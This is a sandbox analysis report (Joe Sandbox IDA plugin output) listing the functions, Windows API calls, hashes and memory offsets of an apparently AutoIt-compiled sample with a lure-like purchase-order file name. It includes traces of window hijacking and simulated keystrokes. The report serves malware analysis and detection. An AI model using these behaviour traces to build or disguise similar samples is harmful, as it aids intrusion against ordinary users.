Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: c1ea313cb3774b737b3be2df8261359b3ea34258dfcead8edd5c43737755358c
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: A1F02836910A24ABC7313A79DC05B9A33E89F72334F104719F428931D2DB70D8128AA6

Function 00149CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00149CBD

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
Instruction ID: c9be9982dbbce08282629cb909c93cb8bf327cd4dd69e68a6a0971e2b98cb951
Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
Instruction Fuzzy Hash: 42F0C8B3600610AED7159F68DC06A67BB98EB54760F10852EFA19CF1D1DB31E514C7E0

Function 00174C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00141129,00000000,?,00172E29,00000001,00000364,?,?,?,0016F2DE,00173863,00211444,?,0015FDF5,?), ref: 00174CBE

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bb59b219a21df14828178fc8661ffb297078275a5d542256e29b77733a85e138
Instruction ID: 547e0c8cf05e84190e67337b3ea12b595278b0d1d6acd138f603f7a2d6323be2
Opcode Fuzzy Hash: bb59b219a21df14828178fc8661ffb297078275a5d542256e29b77733a85e138
Instruction Fuzzy Hash: 17F0E931603224A7DB235F629C09B5A37A8BF517A0B19C515FD1DA61C4CB30DC1196E0

Function 00173820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 812f083da1367f407daeba73e9299c55a921428dbb80a105c6d2592700a5a109
Instruction ID: 3b23d3ba147a3b449f34fdcd8a37c9c489372a684e45fedcd1fb4df464786819
Opcode Fuzzy Hash: 812f083da1367f407daeba73e9299c55a921428dbb80a105c6d2592700a5a109
Instruction Fuzzy Hash: B7E0E53110122597D7212A669C04F9A3768AB527B0F158326BC3C929D5CB31DD11A1E2

Function 00144F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144F6D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4fc2bb5d2ed9c7e1fbbc4c7ee26e15af878170a2e9d4896bfcc359c2a111a86a
Instruction ID: dcb2052d327225042689df4894b5ba4f835fdb0f91579ace7abd540d2136860c
Opcode Fuzzy Hash: 4fc2bb5d2ed9c7e1fbbc4c7ee26e15af878170a2e9d4896bfcc359c2a111a86a
Instruction Fuzzy Hash: 13F03071105752CFDB389F68D490922B7E4AF143193108A7EE1EA82531C7319848DF50

Function 001ACCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0018EE51,00203630,00000002), ref: 001ACD26

Part of subcall function 001ACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,001ACD19,?,?,?), ref: 001ACC59
Part of subcall function 001ACC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,001ACD19,?,?,?,?,0018EE51,00203630,00000002), ref: 001ACC6E
Part of subcall function 001ACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,001ACD19,?,?,?,?,0018EE51,00203630,00000002), ref: 001ACC7A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 0e185c16953dcec617cc6500b56b6f37e9d55d0fb97dbd0d0796ed82a1eb8651
Instruction ID: 4fd93b89294dc4dc49aba842995b9252be6e4fab9d47afcfb627eb0a34ffc041
Opcode Fuzzy Hash: 0e185c16953dcec617cc6500b56b6f37e9d55d0fb97dbd0d0796ed82a1eb8651
Instruction Fuzzy Hash: C9E0397A400714EFC7219F8AD9008AABBF8FF85260710852FE99682510D3B1AA54DBA0

Function 00142DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00142DC4

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 6b7b017d2cc831c445b4a56803db14909f96509123d6842af102fd86e2de3527
Instruction ID: 7b58332a982d034d5c1443cad7ff2861919dde146e009e9ac800466e52156d1b
Opcode Fuzzy Hash: 6b7b017d2cc831c445b4a56803db14909f96509123d6842af102fd86e2de3527
Instruction Fuzzy Hash: 9DE0CD726011245BCB10A2589C05FDA77DDDFC8794F040071FD09D7258DA60AD84C691

Function 00142B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00143837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00143908

Part of subcall function 0014D730: GetInputState.USER32 ref: 0014D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00142B6B

Part of subcall function 001430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0014314E

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: f21425c047bd2e7623290250902744fe2089d0d912c086ccfa507dfd466c1409
Instruction ID: 5ca5d3463da08ae5ce1070a56c7c57a96e687ce5d32eebc98785916cf379bcf1
Opcode Fuzzy Hash: f21425c047bd2e7623290250902744fe2089d0d912c086ccfa507dfd466c1409
Instruction Fuzzy Hash: A1E0262230020503CA04BB74B8124AEB3499BF1315F40063EF15243173CF7045958251

Function 0018039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00180704,?,?,00000000,?,00180704,00000000,0000000C), ref: 001803B7

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2496a1cfd18e288c6b21449ed6dcabde4280d34920d435af07548f90903a2aad
Instruction ID: cc8f5daa0c94d63df840f0f805e9a8a177b8b43bf6a5b6a9109cb31f1539746f
Opcode Fuzzy Hash: 2496a1cfd18e288c6b21449ed6dcabde4280d34920d435af07548f90903a2aad
Instruction Fuzzy Hash: 31D06C3204010DFBDF029F84DD06EDA3BAAFB48714F014000BE1856020C732E861EB90

Function 00141CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00141CBC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 920f538ebc21d1f25ad5ff26f5633bf5c13deca1ce2fd04f77f25179a98b3485
Instruction ID: fcc3d4383b3596f7fe73fa7007c1ec634076f994e0c9fa848cb374729e250db2
Opcode Fuzzy Hash: 920f538ebc21d1f25ad5ff26f5633bf5c13deca1ce2fd04f77f25179a98b3485
Instruction Fuzzy Hash: BBC09B36381305EFF6144B80BC4EF507755E358B00F44C501F709655E3C7B11470D650

Function 001B744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00145745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0014949C,?,00008000), ref: 00145773

GetLastError.KERNEL32(00000002,00000000), ref: 001B76DE

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 8c8bbaa9b17df3c67353e4ac36c0c7b8ee1aede30db8a5eb1eb3bcd307d92ca0
Instruction ID: 480f104c770760b993d6ac01bf2455d85a7958636ec9858ab31c931e63c29657
Opcode Fuzzy Hash: 8c8bbaa9b17df3c67353e4ac36c0c7b8ee1aede30db8a5eb1eb3bcd307d92ca0
Instruction Fuzzy Hash: 2D8180306087019FD714EF28C491BAAB7E5BF99314F04452DF89A5B2E2DB70ED45CB92

Function 00F4CBFC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F4CC11

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: d486a8911f2f31693350c174b1fbd8c7ba965625fc3659fc9ec806098c7a7ebe
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 26E09A7494110DAFDB00EFA4D64969E7BB4EF04301F1005A1FD0596680DA309A549A62

Function 00146246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,001824E0), ref: 00146266

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6cd94fb60e71d48d01a6b2f1dcb3f980c35fc6b7a745f5eca6194c8435c3b8d8
Instruction ID: ca958cf75e6a4246d7b9a2b313d1d79e00cc7d6fa24935803e8758c1b9baeeb6
Opcode Fuzzy Hash: 6cd94fb60e71d48d01a6b2f1dcb3f980c35fc6b7a745f5eca6194c8435c3b8d8
Instruction Fuzzy Hash: 5DE09275401B01EEC3314F1AE804812FBE5FFE23653214A2ED0E692660D3B05886CB51

Function 00F4CC00 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00F4CC11

Memory Dump Source

Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 3cdfe69c711f3e7a8204ce5d138faeaaabf89cec2e46c1e73be3c193e83c1d0e
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 96E0E67494110DDFDB00EFB4D64969E7FB4EF04301F100561FD05D2280D6309D509A62

Non-executed Functions

Function 001D9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001D961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001D965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001D969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001D96C9
SendMessageW.USER32 ref: 001D96F2
GetKeyState.USER32(00000011), ref: 001D978B
GetKeyState.USER32(00000009), ref: 001D9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001D97AE
GetKeyState.USER32(00000010), ref: 001D97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001D97E9
SendMessageW.USER32 ref: 001D9810
SendMessageW.USER32(?,00001030,?,001D7E95), ref: 001D9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001D992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001D9941
SetCapture.USER32(?), ref: 001D994A
ClientToScreen.USER32(?,?), ref: 001D99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001D99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001D99D6
ReleaseCapture.USER32 ref: 001D99E1
GetCursorPos.USER32(?), ref: 001D9A19
ScreenToClient.USER32(?,?), ref: 001D9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 001D9A80
SendMessageW.USER32 ref: 001D9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 001D9AEB
SendMessageW.USER32 ref: 001D9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001D9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 001D9B4A
GetCursorPos.USER32(?), ref: 001D9B68
ScreenToClient.USER32(?,?), ref: 001D9B75
GetParent.USER32(?), ref: 001D9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 001D9BFA
SendMessageW.USER32 ref: 001D9C2B
ClientToScreen.USER32(?,?), ref: 001D9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001D9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 001D9CDE
SendMessageW.USER32 ref: 001D9D01
ClientToScreen.USER32(?,?), ref: 001D9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001D9D82

Part of subcall function 00159944: GetWindowLongW.USER32(?,000000EB), ref: 00159952

GetWindowLongW.USER32(?,000000F0), ref: 001D9E05

Strings

F, xrefs: 001D9D07
@GUI_DRAGID, xrefs: 001D997D
p#!, xrefs: 001D9990

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#!
API String ID: 3429851547-2808124883
Opcode ID: db1701c0be686a09c34a812f32fab54525693b4439208972ee6eba40ac6b7c56
Instruction ID: 22712d5d21ecc5f1d449b435e0e2588e40adcfa11e9820f69a3e897d642878ef
Opcode Fuzzy Hash: db1701c0be686a09c34a812f32fab54525693b4439208972ee6eba40ac6b7c56
Instruction Fuzzy Hash: 2F428D74205241AFDB24CF24CC48EAABBE5FF49310F154A1AF699973A1DB31E864CF91

Function 001D4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001D48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001D4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001D4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001D494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001D495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001D497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001D49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001D49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001D4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001D4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001D4A7E
IsMenu.USER32(?), ref: 001D4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001D4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001D4B20
GetWindowLongW.USER32(?,000000F0), ref: 001D4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001D4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001D4C82
wsprintfW.USER32 ref: 001D4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001D4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 001D4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001D4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001D4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 001D4D5A

Strings

%d/%02d/%02d, xrefs: 001D4CA8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 476a2a4ed4fdce889aa302d25f79c3ed4a2373c32564770c626c5fdb2f97bdf6
Instruction ID: 7fbb24637270aa10c47803bcb07031852d7f34274d0ea444a66e059ca0b2ffe4
Opcode Fuzzy Hash: 476a2a4ed4fdce889aa302d25f79c3ed4a2373c32564770c626c5fdb2f97bdf6
Instruction Fuzzy Hash: E112DD71601215ABEB248F68CC49FAE7BF8EF45710F10462AF916EB3E1DB749941CB90

Function 0015F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0015F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0019F474
IsIconic.USER32(00000000), ref: 0019F47D
ShowWindow.USER32(00000000,00000009), ref: 0019F48A
SetForegroundWindow.USER32(00000000), ref: 0019F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0019F4AA
GetCurrentThreadId.KERNEL32 ref: 0019F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0019F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0019F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0019F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0019F4DE
SetForegroundWindow.USER32(00000000), ref: 0019F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F4F6
keybd_event.USER32(00000012,00000000), ref: 0019F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F50B
keybd_event.USER32(00000012,00000000), ref: 0019F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F519
keybd_event.USER32(00000012,00000000), ref: 0019F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0019F528
keybd_event.USER32(00000012,00000000), ref: 0019F52D
SetForegroundWindow.USER32(00000000), ref: 0019F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0019F557

Strings

Shell_TrayWnd, xrefs: 0019F46F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 34cef7181c4f1180d105340934ffff2537283f5302040cf1182b9201a29a70c4
Instruction ID: bd06cc3e7933db354b363e710678f90685a46ac18a06e140c2a8409241de2487
Opcode Fuzzy Hash: 34cef7181c4f1180d105340934ffff2537283f5302040cf1182b9201a29a70c4
